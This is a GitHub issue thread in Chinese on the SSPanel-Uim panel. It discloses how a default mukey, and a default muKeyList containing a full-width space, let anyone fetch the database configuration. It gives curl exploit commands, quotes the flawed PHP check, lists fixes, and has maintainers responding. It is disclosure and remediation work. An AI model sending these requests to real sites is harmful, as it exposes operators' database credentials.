### ISSUE TITLE
[BUG] 默认口令可能导致的数据库密码泄露

### ISSUE THREAD

**Issue by iamsaltedfish** [Anankke/SSPanel-Uim#1770]
# 问题一：未修改默认mukey导致的泄露风险

## 利用前提

早期 `src/Controllers/Mod_Mu/NodeController.php` 文件中存在 `getConfig` 方法，在 `mukey` 通过认证的前提下，发送 `type` 字段的值为 `database` 可获得 `json` 编码的数据库配置信息，其中包含数据库用户，密码，地址等敏感信息

## 利用过程
`.config.example.php` 默认的 `mukey` 曾有过三个值，分别是 `SSPanel` `NimaQu` `default_mu_key`。若站长未修改默认 `mukey` ，则会导致上述问题

## 利用代码
```
curl -X POST 'https://domain.com/mod_mu/nodes/config?key=SSPanel' -d 'type=database'
```

# 问题二：未正确定义默认值的muKeyList导致的泄露风险

## 影响范围

2019.06.21 ~ 2019.11.08 期间搭建的站长

最初存在问题的版本
Jun 21, 2019 
https://github.com/Anankke/SSPanel-Uim/commit/b5429b5dfa88da44303b8324a9fa54f0af5cd637

最后修复的版本
Nov 8, 2019
https://github.com/Anankke/SSPanel-Uim/commit/74e5f87b847508ad6af38c467ae6fd1d10e28371

部分 malio 版本也可能存在此问题
https://github.com/GeekQuerxy/SSPanel-Malio/blob/master/config/.config.php

## 利用前提

在存在问题的版本中，`config/.config.example.php` 中 `muKeyList` 的默认值不是空数组，而是一个字符串类型的全角空格，`unicode` 码是`\u3000`
```
$_ENV['muKeyList'] = ['　'];                //多 key 列表
```
在需要认证时，下面的方法会将所有合法的 `mukey` 合并在一个数组中。若沿用默认模板设置，字符串类型的全角空格也会作为合法值在合并后的数组中
```
    public static function getMuKey()
    {
        $muKeyList = array_key_exists('muKeyList', $_ENV) ? $_ENV['muKeyList'] : ['　'];
        return array_merge(explode(',', $_ENV['muKey']), $muKeyList);
    }
```
此处的认证没有进一步的过滤和校验
```
        if (!in_array($key, Config::getMuKey())) {
            // key 不存在
            return $response->withJson([
                'ret' => 0,
                'data' => 'Token is invalid.',
            ]);
        }
```

## 利用过程

向站点发送请求时，将全角空格作为 `mukey` 即可通过校验。配合 `getConfig` 方法，即可获得数据库配置信息

## 利用代码

注意 `key` 的值是全角空格
```
curl -X POST 'https://domain.com/mod_mu/nodes/config?key=　' -d 'type=database'
```

# 修复建议
- 注释掉此条路由
```
$this->post('/nodes/config', App\Controllers\Mod_Mu\NodeController::class . ':getConfig');
```
- 编辑 `config/.config.php` ，将 `muKeyList` 的默认值设置为空数组
```
$_ENV['muKeyList'] = [];                //多 key 列表
```
- 更换当前在用数据库用户和密码
- 更换当前在用的 `mukey`

**Comment by Anankke** [comment]
默认 Mukey 更改在所有教程中均有提及，由于使用者不去更改导致默认值导致安全问题不应当算安全漏洞。
真要想改就别一个版本一个 key 了，在初始化脚本里上 key 生成器就好了（Laravel：？）。
第二个问题早已修复，历史上由于数据库对接遗留下的自动配置测试接口，现在数据库配置已经废弃，安全删除即可。
如果没有使用数据库配置，则数据库一般都不对外开放，也不是一个漏洞。
综上，修改意见为在初始化脚本中上自动生成器，而不是继续去改 key。

**Comment by dgou45** [comment]
赞楼主一个。

注释掉此条路由
$this->post('/nodes/config', App\Controllers\Mod_Mu\NodeController::class . ':getConfig');

注释掉这条路由不会有其他影响吗

**Comment by dgou45** [comment]
如果和别人共用节点，不就需要告诉对方mukey吗
如果别人知道你的mukey，是不是还是可以利用第一个问题

**Comment by M1Screw** [comment]
> 如果和别人共用节点，不就需要告诉对方mukey吗 如果别人知道你的mukey，是不是还是可以利用第一个问题 所以这算不算漏洞？

目前版本是不可能出現這個問題的，唯一的風險就是對方使用你站點的 muKey 獲取你節點的配置信息，每個節點下發的用戶 ID，用戶 UUID 和用戶當前在綫 IP 總數，目前版本的 WebAPI 數據下發中不涉及任何用戶的隱私信息（用戶名，郵箱，最後使用時間等等）。

當然 muKey 泄露也依然是一個非常糟糕的情況，但遠遠沒有以前可能導致資料庫被遠程下載（拖庫）來得惡劣。
